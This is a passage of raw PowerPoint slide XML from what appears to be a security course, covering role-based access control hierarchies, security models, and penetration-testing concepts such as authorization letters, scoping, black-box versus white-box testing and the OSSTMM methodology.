              <a:t>consists of the activation of a subset of the roles of a user for the purpose of performing a certain task. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>For example, a laptop user may create a session with the administrator role to install a new program. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Sessions support the principle of least privilege.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF99276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Hierarchical RBAC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the role-based access control model, roles can be structured in a hierarchy similar to an organization chart. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More formally, we define a partial order among roles by saying that a role R1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>inherits role R2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which is denoted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>					R1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> R2,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	if R1 includes all permissions of R2 and R2 includes all users of R1. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When R1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> R2, we also say that role R1 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>senior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to role R2 and that role R2 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>junior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to role R1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, in a company, the role “manager” inherits the role “employee” and the role “vice president” inherits the role “manager.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also, in a university, the roles “undergraduate student” and “graduate student” inherit the role “student.”</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Visualizing Role Hierarchy</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22</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90599" y="1371600"/>
            <a:ext cx="7281989" cy="5257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8313" y="1196975"/>
            <a:ext cx="7991475" cy="2879725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto data 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{110DB968-1A81-4484-A270-B6A92F997152}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto numero diapositiva 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{078B4451-9544-46BA-A8AE-3469E59A7BED}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto piè di pagina 7"/>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934845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What Is a Penetration Testing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Testing the security of systems and architectures from the point of view of an attacker (hacker, cracker …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A “simulated attack” with a predetermined goal that has to be obtained within a fixed time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DC40089A-E181-4F8A-ACA9-E7A3E2C7A89E}"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7FA0253A-833B-48D1-9D3E-C97B0888844A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</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2272412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Penetration Testing Is Not…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>An alternative to other IT security measures – it complements other tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Expensive game of Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>A guarantee of security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8273214E-F06A-4042-952C-622237DA8315}"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FBAE8954-81F8-40E4-AD0D-F3359EC77A46}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</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048529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Authorization Letter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Detailed agreements/scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Anything off limits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hours of testing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social Engineering allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>War Dialing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>War Driving?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Denials of Service?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Define the end point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consult a lawyer before starting the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E4818972-638C-48F9-92CC-877B5E7728A6}"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1F02A705-3BFB-4D68-979D-81DCC34AAB9F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</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919360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To Tell or Not to Tell?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Telling too many people may invalidate the test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>However, you don’t want valuable resources chasing a non-existent “intruder” very long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>And, elevation procedures make not telling risky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{260C45FB-1824-4F97-9564-5A245FC190A8}"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D36F38C0-D7E7-4B53-B8CB-F0C4928283E1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27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2647319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500063"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Black Box      vs.     White Box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="1981200"/>
            <a:ext cx="3929062" cy="3827463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It treats the system as a "black-box", so it doesn't explicitly use knowledge of the internal structure.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5000625" y="2057400"/>
            <a:ext cx="3857625" cy="3898900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="290513" indent="-290513" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It allows one to peek inside the "box", and it focuses specifically on using internal knowledge of the software to guide the selection of test data</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F304631C-B9C9-4FDE-8216-4A9B827A4C66}"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9013F957-3B34-42DF-9247-E1D50024B60E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</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483760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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{031FB3CB-8187-4756-87F3-22CB2F93A3D1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OSSTMM	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500063" y="1447800"/>
            <a:ext cx="8415337" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OSSTMM – Open-Source Security Testing Methodology Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Version 3.0 RC 26 at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.osstmm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> http://www.isecom.org/projects/osstmm.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It defines how to go about performing a pen test, but does not go into the actual tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{37194305-9CEA-43D9-B26E-EEAF359D1520}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11271" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3505200"/>
            <a:ext cx="2628900" cy="781050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11272" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7693025" y="0"/>
            <a:ext cx="1450975" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2183832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Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="6096000" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>security model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is an abstraction that provides a conceptual language for administrators to specify security policies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically, security models define hierarchies of access or modification rights that members of an organization can have, so that subjects in an organization can easily be granted specific rights based on the position of these rights in the hierarchy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples include military classifications of access rights for documents based on concepts like “unclassified,” “confidential,” “secret,” and “top secret.”</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3</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400800" y="2283733"/>
            <a:ext cx="2667000" cy="3488063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="5943600"/>
            <a:ext cx="2066591" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
              <a:t>U.S. government image in the public domain.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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numero diapositiva 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{80178257-7076-49B8-BE34-4D81D518D8B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Technique – Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
